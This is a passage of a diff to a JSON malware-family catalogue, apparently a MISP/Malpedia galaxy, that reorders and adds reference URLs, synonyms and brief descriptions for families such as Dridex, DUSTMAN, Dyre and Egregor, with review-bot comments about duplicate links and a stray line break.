"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", + "https://viql.github.io/dridex/", + "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware", + "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/", + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/", - "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + 
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", + "https://blog.lexfo.fr/dridex-malware.html", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://intel471.com/blog/privateloader-malware", + "https://unit42.paloaltonetworks.com/travel-themed-phishing/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.atomicmatryoshka.com/post/malware-headliners-dridex", + "https://muha2xmad.github.io/unpacking/dridex/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + 
"https://cyber-anubis.github.io/malware%20analysis/dridex/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", - "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/", - "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", - "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://en.wikipedia.org/wiki/Maksim_Yakubets", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", 
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", + "https://www.youtube.com/watch?v=1VB15_HgUkg", + "https://twitter.com/felixw3000/status/1382614469713530883?s=20", + "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex" + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", + "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "http://www.secureworks.com/research/threat-profiles/gold-heron", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", + 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://community.riskiq.com/article/2cd1c003", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/" ], "synonyms": [], "type": [] @@ -22609,11 +23692,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/", "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" ], "synonyms": [ "Spy.Agent.ORM", @@ -22659,8 +23742,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.drokbk", + "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver", "https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/", - "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver" + "https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor" ], "synonyms": [], "type": [] 
@@ -22673,8 +23757,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign"
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -22687,9 +23771,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot",
- "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
+ "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/"
 ],
 "synonyms": [],
 "type": []
@@ -22702,23 +23786,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", - "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage", "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", - "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", - "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", + "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", + "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", + 
"https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", "https://securelist.com/dtrack-targeting-europe-latin-america/107798/", - "https://securelist.com/my-name-is-dtrack/93338/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ + "Preft", "TroyRAT" ], "type": [] @@ -22744,8 +23831,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN" ], 
@@ -22773,12 +23860,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail",
- "https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/",
+ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
 "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf",
 "https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf",
- "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
+ "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/",
 "https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection",
- "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/"
+ "https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/"
 ],
 "synonyms": [],
 "type": []
@@ -22803,12 +23890,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://docs.broadcom.com/doc/w32-duqu-11-en",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
 "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf",
+ "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/",
 "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
- "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -22817,17 +23904,17 @@ "value": "DuQu" }, { - "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. 
\"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html", "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://twitter.com/Irfan_Asrar/status/1213544175355908096", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/", - "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/" ], "synonyms": [], "type": [] 
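Review bot: The rewritten DUSTMAN description still carries a literal `\r\n` in the middle of the string (`malware,\r\npublished`), a copy artifact from the source report that now sits next to the freshly normalized `\u2019` escape. Since the commit already rewrites this string, the carriage return should go with it: change `malware,\r\npublished in December 2019.` to `malware, published in December 2019.`. The remainder of the hunk only reorders `refs`.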
@@ -22840,10 +23927,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.secureworks.com/research/threat-profiles/nickel-academy" ], "synonyms": [ "Escad" @@ -22858,13 +23945,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", - "https://content.fireeye.com/apt/rpt-apt38", + "https://securelist.com/lazarus-under-the-hood/77908/", "https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks", + "https://github.com/649/APT38-DYEPACK", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", - "https://github.com/649/APT38-DYEPACK" + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [ + "BanSwift", "swift" ], "type": [] 
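Review bot: The new DYEPACK `refs` list cites the same Securelist article twice: the added `https://securelist.com/lazarus-under-the-hood/77908/` and the retained `https://securelist.com/blog/sas/77908/lazarus-under-the-hood/` appear to be the current and legacy permalinks for post 77908, judging by the shared id and slug. Keep one of them, or have the import step deduplicate by normalized URL, so consumers of the galaxy do not double-count sources. The added `BanSwift` synonym next to the existing lowercase `swift` is fine but worth confirming the casing matches the vendor's naming.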
@@ -22890,19 +23981,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", - "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.secureworks.com/research/dyre-banking-trojan", + "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "http://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html" + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + 
"https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/" ], "synonyms": [ "Dyreza" @@ -22930,8 +24021,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight", - "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://content.fireeye.com/api/pdfproxy?id=86840" + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" ], "synonyms": [], "type": [] @@ -22944,8 +24035,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", - "https://twitter.com/JaromirHorejsi/status/815861135882780673", - "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/" + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] 
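Review bot: The rebuilt Dyre `refs` list ends up with two duplicate pairs on the new side: `http://www.secureworks.com/research/threat-profiles/gold-blackburn` next to its `https://` twin, and the `securingtomorrow.mcafee.com` URL alongside `https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/`, which by path looks like the same article after a domain migration. Drop the `http://` and `securingtomorrow` variants, or deduplicate references by scheme-insensitive normalized URL in the generator. The EasyNight and EDA2 hunks sharing this line are reorders only.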
@@ -22954,76 +24045,76 @@ "value": "EDA2" }, { - "description": "", + "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim\u2019s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim\u2019s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named \u201cRECOVER-FILES.txt\u201d in all the compromised folders. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", - "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", - 
"https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", - "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", + 
"https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", + "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.group-ib.com/blog/egregor", "https://www.intrinsec.com/egregor-prolock/", + "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + 